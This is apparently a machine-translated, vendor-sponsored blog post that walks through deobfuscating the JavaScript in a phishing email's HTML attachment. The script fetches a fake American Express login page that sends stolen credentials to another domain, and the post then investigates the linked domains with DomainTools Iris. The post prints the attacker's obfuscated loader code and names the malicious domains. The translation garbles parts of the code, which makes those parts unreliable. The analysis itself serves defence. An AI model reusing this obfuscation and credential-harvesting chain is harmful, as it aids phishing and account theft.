Bài đăng trên blog này được tài trợ bởi DomainTools. Để biết thêm thông tin và dùng thử sản phẩm, vui lòng truy cập https: //securityweekly.com/domaintools.
Thời gian điều tra!
Bạn có thể đang ngồi làm việc vào sáng sớm, thưởng thức ly cà phê của mình và cảm giác yên bình, tĩnh lặng khi là người đầu tiên đến văn phòng. Giống như hầu hết, điều đầu tiên bạn làm là kiểm tra một số email (không phải tất cả, chỉ một số, vì có rất nhiều email!). Bạn đã trở nên khá giỏi trong việc phát hiện các email lừa đảo, thậm chí còn kiếm được một vài chiếc áo thun và bia koozies trong suốt quá trình tham gia chương trình đào tạo nâng cao nhận thức về bảo mật của công ty. Một trong những email đầu tiên bạn phát hiện được cho là từ American Express, một công ty mà bạn có thẻ tín dụng. Chủ đề có nội dung “Hoạt động không thường xuyên” và trong một khoảnh khắc ngắn, bạn hoảng sợ và nghĩ rằng ai đó đã đánh cắp thẻ tín dụng của bạn. Thoạt nhìn, email có phần đáng tin cậy vì bạn có một vài thẻ Amex của công ty, trước đây bạn đã có các khoản phí gian lận và các thẻ này được lưu trữ trong một số tài khoản trực tuyến để thanh toán tự động (khiến bạn dễ bị gian lận và hoạt động không thường xuyên) Sau đó, một giọng nói cất lên với âm vang lớn: “Hãy nhớ bài huấn luyện của bạn”. Bạn thoát khỏi chế độ hoảng sợ, nhớ lại sự chuẩn bị của mình và bắt đầu điều tra email sau:
Khi nhâm nhi ly cà phê và kiểm tra các chi tiết của email, bạn nhận thấy một số điều đáng ngờ:
- Người gửi “American ExpressAmericanexpress@rugjam.com> ”Là lạ, vì miền không chứa tham chiếu đến American Express theo bất kỳ cách nào.
- Ngữ pháp của email là một mớ hỗn độn
- Người gửi yêu cầu bạn tải xuống tệp HTML để truy cập trang sẽ kích hoạt tài khoản của bạn (mặc dù Sir Tim Berners-Lee đã phát minh ra World Wide Web vào năm 1989).
Dựa trên những dữ kiện này, bạn quyết định cảnh báo nhóm bảo mật địa phương của mình về một email lừa đảo / lừa đảo tiềm ẩn.
Pháp y cơ bản
“Chà, cảm ơn trời đất vì đã đào tạo nâng cao nhận thức cho người dùng cuối” Tôi mỉa mai nghĩ khi nhận được email này. Sự mỉa mai bắt nguồn từ nhiều năm kinh nghiệm, khi biết rằng cứ 10 người dùng báo cáo một hành vi lừa đảo lừa đảo, có thể có ít nhất một người mắc phải và gây ra sự cố bảo mật, có thể là vào cuối buổi chiều thứ Sáu. Trong mọi trường hợp, tôi quyết định xem xét email này vì tôi là một người yêu thích bảo mật và bị hấp dẫn bởi tệp đính kèm HTML vì nó là một dấu hiệu cho thấy trò lừa đảo lừa đảo này có thể không phức tạp như vậy.
Hãy xem HTML đính kèm:
Khi xem xét nhanh, HTML rất cơ bản của nó với một tập lệnh nhúng đang kéo JavaScript khỏi một trang web. Nếu bạn đang giữ điểm ở nhà, chỉ cần xem email và tệp đính kèm, tôi có hai miền cần điều tra:
- rugjam.com
- jlijten.nl
Vì vậy, bằng cách sử dụng công cụ dòng lệnh “wget”, tôi kéo JavaScript xuống (tôi không muốn chạy nó trong trình duyệt web của mình và tùy chọn khác của tôi là kích hoạt môi trường pháp y của mình, nhưng tôi lười và chỉ sử dụng wget). Tệp JavaScript kết quả xuất hiện và trình bày cho tôi một số phép toán:
var erp = new Mảng;
erp [0] = 1014195058;
erp [1] = 1768977440;
erp [2] = 1954115685;
erp [3] = 1025668197;
erp [4] = 2020880234;
erp [5] = 1635148147;
erp [6] = 1668442480;
erp [7] = 1948401270;
var em = ”;
cho (i = 0; i
tmp = erp [i];
if (Math.floor ((tmp / Math.pow (256,3)))> 0) {
em + = String.fromCharCode (Math.floor ((tmp / Math.pow (256,3))));
};
tmp = tmp - (Math.floor ((tmp / Math.pow (256,3))) * Math.pow (256,3));
if (Math.floor ((tmp / Math.pow (256,2)))> 0) {
em + = String.fromCharCode (Math.floor ((tmp / Math.pow (256,2))));
};
tmp = tmp - (Math.floor ((tmp / Math.pow (256,2))) * Math.pow (256,2));
if (Math.floor ((tmp / Math.pow (256,1)))> 0) {
em + = String.fromCharCode (Math.floor ((tmp / Math.pow (256,1))));
};
tmp = tmp - (Math.floor ((tmp / Math.pow (256,1))) * Math.pow (256,1));
if (Math.floor ((tmp / Math.pow (256,0)))> 0) {
em + = String.fromCharCode (Math.floor ((tmp / Math.pow (256,0))));
};
};
//tài liệu.write(em);
console.log (em);
Một số JavaScript "ưa thích" hả? Nó sử dụng hàm JavaScript Math để làm xáo trộn mã thực. Kinda cục mịch, có thể hơi gọn gàng, nhưng rất khó chịu. Không muốn tải cái này trong trình duyệt (vâng, tôi thật lười biếng!) Tôi đã cài đặt gói nút cục bộ. Node có thể thực thi JavaScript trên dòng lệnh và giúp tôi không gặp rắc rối và rủi ro khi mở nó bằng trình duyệt web. Tôi đã thay thế hàm “document.write” bằng “console.log” để tôi có thể xem kết quả trong terminal. Vì chúng tôi không ở trong trình duyệt web, chúng tôi không có quyền truy cập vào đối tượng tài liệu, nhưng chúng tôi có quyền truy cập vào đối tượng bảng điều khiển. Tôi đã thực thi JavaScript bằng lệnh sau:
nút $ ft.js
<script type=”text/javascript”>var i,t=”3c06877476d26c93e80a03c86826526126453e00a43c66d06567496152036847447447042d06567107536987643d82294326f56e17416536e27402d65447927016542262086346f36e77406576e17443d22267456587867482f76817466d76c43b12096366856117267316557493d34905364f22d53893803553962d13192282082f53e70a53c37356377206927017422017387276333d42296887437427083a92f52f36396f56d96e56176392e46356f46d22f16287076b82e86a07302203e23c82f87356327276947067403e30a53c52f76846506166403e80a53c56246f06487953e80a63c42f76266f56477993e30a53c52f66837496d36c33e3″,x=””;for(i=0;i<t.length;i+=3){x+=unescape(“%”+t.substr(i,2));}document.write(x);</script>
Điều này khám phá ra nhiều JavaScript hơn nữa. Hãy làm điều tương tự, thay thế document.write bằng console.log, sau đó chạy nút:
nút $ ft2.js
Lại đây! Lần này JavaScript giải nén và cung cấp cho chúng tôi HTML đang tải thêm JavaScript, lần này từ một trang web khác. Bây giờ chúng tôi cũng có một miền khác để điều tra và một tập lệnh khác để tải xuống, khi chúng tôi áp dụng quy trình tương tự, sẽ trông giống như sau:
erp [12237] = 1953658213;
erp [12238] = 539573005;
erp [12239] = 169877536;
erp [12240] = 545066250;
erp [12241] = 538976288;
erp [12242] = 791620909;
erp [12243] = 1041041980;
erp [12244] = 796091250;
erp [12245] = 1768977470;
erp [12246] = 3338;
var em = ”;
cho (i = 0; i
tmp = erp [i];
if (Math.floor ((tmp / Math.pow (256,3)))> 0) {
em + = String.fromCharCode (Math.floor ((tmp / Math.pow (256,3))));
};
tmp = tmp - (Math.floor ((tmp / Math.pow (256,3))) * Math.pow (256,3));
if (Math.floor ((tmp / Math.pow (256,2)))> 0) {
em + = String.fromCharCode (Math.floor ((tmp / Math.pow (256,2))));
};
tmp = tmp - (Math.floor ((tmp / Math.pow (256,2))) * Math.pow (256,2));
if (Math.floor ((tmp / Math.pow (256,1)))> 0) {
em + = String.fromCharCode (Math.floor ((tmp / Math.pow (256,1))));
};
tmp = tmp - (Math.floor ((tmp / Math.pow (256,1))) * Math.pow (256,1));
if (Math.floor ((tmp / Math.pow (256,0)))> 0) {
em + = String.fromCharCode (Math.floor ((tmp / Math.pow (256,0))));
};
};
//tài liệu.write(em);
console.log (em);
Tôi nghĩ tất cả chúng ta đều biết phải làm gì bây giờ! Hãy chạy tập lệnh này thông qua cùng một quy trình:
nút $ bpk.js:
American Express
<tên meta=”từ khóa”
content = 'mật khẩu, ID người dùng, quên mật khẩu, quên id người dùng, tên người dùng, tên người dùng, Quên ID người dùng hoặc Trợ giúp mật khẩu, Lấy ID, Cập nhật mật khẩu, Đặt lại mật khẩu' />
<link rel=”chuẩn”
Hiện chúng tôi có một trang web HTML đầy đủ, đây là một trang web American Express hoàn toàn lừa đảo được tạo ra để thu thập thông tin đăng nhập tài khoản trực tuyến Amex của người dùng. Mặc dù trang web được thiết lập để trông giống như trang American Express (thậm chí sử dụng một số nhúng JavaScript từ trang Amex thực), yêu cầu POST đang gửi thông tin đăng nhập của người dùng đến một trang web khác:
Bây giờ có một miền khác để điều tra!
Công cụ miền Iris
Tôi đã lấy danh sách các miền sau đây có được từ bài tập này và cắm chúng vào Iris (bạn chỉ cần sao chép và dán toàn bộ danh sách vào thanh tìm kiếm Iris):
- rugjam.com
- jlijten.nl
- Comnac.com
- heilgeist64.de
Domaintools Iris giúp việc điều tra nhanh chóng danh sách tên miền trở nên thực sự dễ dàng. Con đường đầu tiên của tôi là xem lại danh sách và tìm kiếm bất kỳ Phần nào có Hướng dẫn.
Iris cung cấp cho bạn khả năng đưa các miền và địa chỉ IP có liên quan khác vào cuộc điều tra của bạn bằng cách gắn cờ chúng trong các Vùng có hướng dẫn. Dưới đây, tôi nhận thấy rằng một trong các miền chia sẻ cùng địa chỉ IP với một loạt các miền khác:
Tôi đã nhấp vào "mở rộng tìm kiếm", điều này sẽ thêm tất cả 261 tên miền vào danh sách, sau đó tôi sắp xếp theo Điểm rủi ro:
Có vẻ như miền này có thể có một số hàng xóm xấu. Đây cũng có thể là dấu hiệu của một âm mưu lừa đảo trong tương lai, vì vậy tôi có thể tiếp tục và chặn tất cả các miền này hoặc địa chỉ IP, ít nhất là trong một khoảng thời gian cụ thể để ngăn chặn bất kỳ nỗ lực lừa đảo nào tiếp theo. Tôi cũng nhận ra rằng các miền được sử dụng trong trò lừa đảo lừa đảo có thể đã bị tấn công, theo một số cách khác nhau và được (những) kẻ tấn công giống nhau tập hợp lại để thực hiện trò lừa đảo trực tuyến. Tôi đã xem xét một số thông tin DNS thụ động và tiết lộ kết quả tương tự cho tất cả các miền: Tất cả chúng đều có một số loại thư, ftp và các dịch vụ khác chạy trên các miền phụ:
Kết quả trên cũng rất thú vị vì các miền phụ chứa tên của các miền phổ biến khác. Đây là một chỉ báo rõ ràng hơn rằng những miền này không sống trong một khu phố tốt đẹp.
Tôi cũng đã kiểm tra với VirusTotal để xem nó biết gì về một số miền liên quan, hóa ra chúng đã bị gắn cờ là độc hại:
Một người dùng thậm chí còn nhận xét rằng họ đã quan sát thấy miền này trong một trò lừa đảo trực tuyến:
Đừng đánh giá một cuốn sách bằng điểm rủi ro
Hành động của tôi rất đơn giản, tôi đã chặn các miền và địa chỉ IP liên quan đến trò lừa đảo lừa đảo này. Mặc dù Điểm rủi ro miền không cao, cuộc điều tra của tôi cho thấy rằng các miền đang chia sẻ một số cơ sở hạ tầng giống nhau (địa chỉ IP), không lưu trữ bất kỳ trang web nào có vẻ được người dùng của chúng tôi sử dụng và chứa một số dịch vụ có khả năng được nhắm mục tiêu bởi kẻ tấn công để giành quyền kiểm soát hệ thống.
